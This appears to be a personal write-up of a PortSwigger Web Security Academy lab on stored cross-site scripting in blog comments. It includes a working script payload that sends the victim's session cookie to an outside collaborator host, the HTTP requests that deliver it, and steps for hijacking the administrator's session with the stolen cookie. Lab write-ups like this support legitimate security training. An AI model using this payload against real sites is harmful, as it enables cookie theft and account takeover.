Exploiting cross site scripting to steal cookies
Description
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's session cookie, then use this cookie to impersonate the victim.
Approach
After accessing the lab, I went straight to the comment section and intercepted a request for writing a comment. I started by injecting some HTML tags into all the parameters to see if they would be reflected and executed.
Here is the initial request I tested:
POST /post/comment HTTP/2
Host: 0ac0006b031dd3e58149805400aa0035.web-security-academy.net
Cookie: session=yDz4qBe80MaMP1NdoROJ3AqhkYLFAcki
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...
csrf=hbrtk78h7GPkN9RvkL7fTu7A1hnHy5Ff&postId=9&comment=<b>hacked</b>&name=<b>hacked</b>&email=<b>hacked</b>%40qwe.com&website=http%3A%2F%2FInconsistent.comThe HTML tags were rendered correctly in the comment section, indicating that the input wasn't sanitized and the parameter was vulnerable to Cross-Site Scripting (XSS).
Next, I injected a malicious script to steal the cookie of anyone who views my comment and send it back to me via Burp Collaborator. The payload I used was:
<script>fetch('http://collaborator_pauload/?cookie=' + document.cookie);</script>Here is how my request looked after URL encoding the payload:
POST /post/comment HTTP/2
Host: 0ac0006b031dd3e58149805400aa0035.web-security-academy.net
Cookie: session=yDz4qBe80MaMP1NdoROJ3AqhkYLFAcki
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...
csrf=hbrtk78h7GPkN9RvkL7fTu7A1hnHy5Ff&postId=9&comment=<script>fetch('http%3a//orjh9pyr6vnqwpy9yx2veooyhpngbhz6.oastify.com/%3fcookie%3d'+%2b+document.cookie)%3b</script>&name=ichyaboy&email=qwe%40qwe.com&website=http://hacker.com
After submitting the comment, I went to the Burp Collaborator tab and clicked Poll now. I saw some requests and upon checking the HTTP request, I clicked on Request to collaborator to view the details. I found the following request:
GET /?cookie=secret=BRVt9vEFnSygDFObRWIvLWhxIoPZDzV3;%20session=09lYgD4mdNhT2scAbn2iYil8SvxSckhJ HTTP/1.1
Host: o7whppermv3qcpe9exivuo4yxp3grafz.oastify.com
...
This request contained the victim's cookies. By going to the home page, pressing F12 to open the developer tools, navigating to the storage tab, and then to cookies, I replaced the value of my current session cookie with the victim's session cookie. After reloading the page, I was logged in as the administrator. This solved the lab.